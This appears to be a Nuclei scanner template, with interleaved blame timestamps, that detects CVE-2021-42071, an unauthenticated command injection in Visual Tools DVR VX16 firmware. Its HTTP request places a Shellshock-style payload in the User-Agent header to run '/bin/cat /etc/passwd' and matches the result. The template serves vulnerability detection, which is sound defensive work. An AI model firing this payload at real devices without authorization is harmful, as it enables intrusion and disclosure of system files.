2022-04-07 13:53:15 +00:00
id : CVE-2021-42071
2021-07-22 23:47:29 +00:00
info :
2022-04-15 16:39:44 +00:00
name : Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
2021-07-22 23:47:29 +00:00
author : gy741
severity : critical
2022-04-07 13:53:15 +00:00
description : Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in the Visual Tools DVR VX16 4.2.28.0 device.
2021-08-18 11:37:49 +00:00
reference :
2021-07-22 23:47:29 +00:00
- https://www.exploit-db.com/exploits/50098
2022-04-07 13:53:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-42071
2022-05-17 09:18:12 +00:00
- https://visual-tools.com/
2022-04-07 13:53:15 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-04-07 13:53:15 +00:00
cve-id : CVE-2021-42071
2022-05-17 09:18:12 +00:00
cwe-id : CWE-78
2023-10-14 11:27:55 +00:00
epss-score : 0.95761
2023-12-12 11:07:52 +00:00
epss-percentile : 0.99279
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:visual-tools:dvr_vx16_firmware:4.2.28.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : visual-tools
product : dvr_vx16_firmware
2023-12-05 09:50:33 +00:00
tags : edb,cve,cve2021,visualtools,rce,oast,injection,visual-tools
2022-04-15 16:39:44 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-22 23:47:29 +00:00
- raw :
- |
GET /cgi-bin/slogin/login.py HTTP/1.1
Host : {{Hostname}}
Accept : */*
User-Agent : () { :; }; echo ; echo ; /bin/cat /etc/passwd
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-22 23:47:29 +00:00
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 4a0a00473045022100a479b01a7bf7e89841ec6775bd12ebb82d151c577e57e41d292e226fa7f7010c02202947c8b00d6356098bdd7a55186648ccd717c3d1b2c53031641c9279fd518f88:922c64590222798bb761d5b6d8e72950